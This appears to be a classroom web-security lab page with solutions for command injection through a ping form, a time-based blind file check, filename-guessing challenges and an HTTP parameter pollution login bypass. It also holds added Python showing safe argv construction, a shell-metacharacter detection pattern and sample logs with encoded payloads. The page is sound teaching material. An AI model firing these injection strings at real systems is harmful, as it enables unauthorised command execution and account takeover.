Sam Bowne

1. Side-Channel

Network Test

Target:

Goal: View output of "ls"

Solution

google.com | ls > /var/www/html/YOURNAME.htm
Then view https://attack.samsclass.info/YOURNAME.htm

2. Time-Based

Network Test

Target:

Goal: Determine if a file named "/tmp/flag" exists

Injections to Try

google.com | ls > /var/www/html/YOURNAME.htm
Fails because < and > are filtered.
google.com | if [ -f /tmp/flag ]; then ping -c 10 127.0.0.1; fi;ls
Fast because the file doesn't exist
google.com | if [ -f /tmp/netok ]; then ping -c 10 127.0.0.1; fi;ls
Slow because the file does exist
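Defender's view of exercises 1 and 2, as an added example that is not part of the original lab page: the pattern that makes the ping form injectable is pasting the submitted target into a shell string, and the `<`/`>` filter in exercise 2 fails because it is a denylist, so `|`, `;` and `if [ -f ... ]` still reach the shell and leave a timing side channel. The code contrasts that with an allowlist check plus an argv list that never touches a shell, and adds a small log scan that flags submissions containing shell metacharacters. The parameter name `target`, the path `/ping.php` and the access-log lines are constructed for the example.

```python
"""Safe construction of a ping command, beside the unsafe patterns from the lab."""
import re
import subprocess
from typing import List, Tuple
from urllib.parse import unquote_plus

# Allowlist: RFC 1123-style hostname labels, or a dotted-quad IPv4 address.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}"
    r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)$"
)
# Characters that give the shell a second command, a redirection, or a subshell.
SHELL_META_RE = re.compile(r"[|;&$`<>(){}\n\\]")


def vulnerable_command(target: str) -> str:
    """Exercise 1's pattern: user input concatenated into a shell string.
    The shell parses '|' and runs whatever follows as a second command."""
    return "ping -c 3 " + target


def denylist_filtered_command(target: str) -> str:
    """Exercise 2's pattern: only '<' and '>' are stripped. Redirection is
    blocked, but pipes, semicolons and test expressions still reach the shell."""
    return "ping -c 3 " + target.replace("<", "").replace(">", "")


def is_valid_target(target: str) -> bool:
    """Allowlist check: accept only a plain hostname or IPv4 address."""
    return bool(HOSTNAME_RE.match(target) or IPV4_RE.match(target))


def safe_argv(target: str) -> List[str]:
    """Validate first, then build an argv list. No shell ever parses it, so a
    metacharacter in the value could only ever be one literal argument."""
    if not is_valid_target(target):
        raise ValueError("rejected target: %r" % target)
    return ["ping", "-c", "3", target]


def run_ping(target: str, timeout: float = 15.0) -> str:
    """Run ping without shell=True; argv list comes from safe_argv()."""
    proc = subprocess.run(safe_argv(target), capture_output=True, text=True, timeout=timeout)
    return proc.stdout


def find_injection_attempts(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Detection: return (line number, decoded target) for each access-log line
    whose 'target' query parameter (assumed name) fails the allowlist or
    contains a shell metacharacter."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'[?&]target=([^&\s"]*)', line)
        if not m:
            continue
        value = unquote_plus(m.group(1))
        if SHELL_META_RE.search(value) or not is_valid_target(value):
            hits.append((n, value))
    return hits


# Constructed access-log lines; the path and parameter name are assumptions.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Mar/2019:10:00:00 -0700] "GET /ping.php?target=google.com HTTP/1.1" 200 512',
    '203.0.113.5 - - [18/Mar/2019:10:00:07 -0700] "GET /ping.php?target=google.com+%7C+ls+%3E+%2Fvar%2Fwww%2Fhtml%2FYOURNAME.htm HTTP/1.1" 200 512',
    '203.0.113.5 - - [18/Mar/2019:10:00:31 -0700] "GET /ping.php?target=google.com+%7C+if+%5B+-f+%2Ftmp%2Fflag+%5D%3B+then+ping+-c+10+127.0.0.1%3B+fi%3Bls HTTP/1.1" 200 9000',
    '198.51.100.9 - - [18/Mar/2019:10:01:02 -0700] "GET /ping.php?target=127.0.0.1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, value in find_injection_attempts(SAMPLE_LOG):
        print("line %d: suspicious target %r" % (n, value))
    print(safe_argv("google.com"))
```

The allowlist is what actually closes the hole; the argv list is defence in depth, and the log scan is the detection a SOC would run over the web server's access log to see attempts like those in the lab.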

Challenge 2a (10 pts. extra credit)

There is a file in /usr/local/secret with a one-digit filename between 0 and 9. Find that filename.

Challenge 2b (10 pts. extra credit)

There is a file in /usr/local/secret with a three-digit filename between 000 and 999. Find that filename.

Challenge 2c (10 pts. extra credit)

There is a file in /usr/local/secret with a nine-digit filename between 000000000 and 999999999. Find that filename.

3. HTTP Parameter Pollution

Log In

Username:

Password:

The administrator punished wally for using a password of "wally" by locking his account out.

Goal: Sign in as "wally" anyway.

Solution

Log in with this username:
wally&lockout=0
The URL becomes this, and the second parameter assignment wins on my server.
https://attack.samsclass.info/hpp1b.php?lockout=1&username=wally&lockout=0&password=wally

ping address changed to 127.0.0.1 3-18-19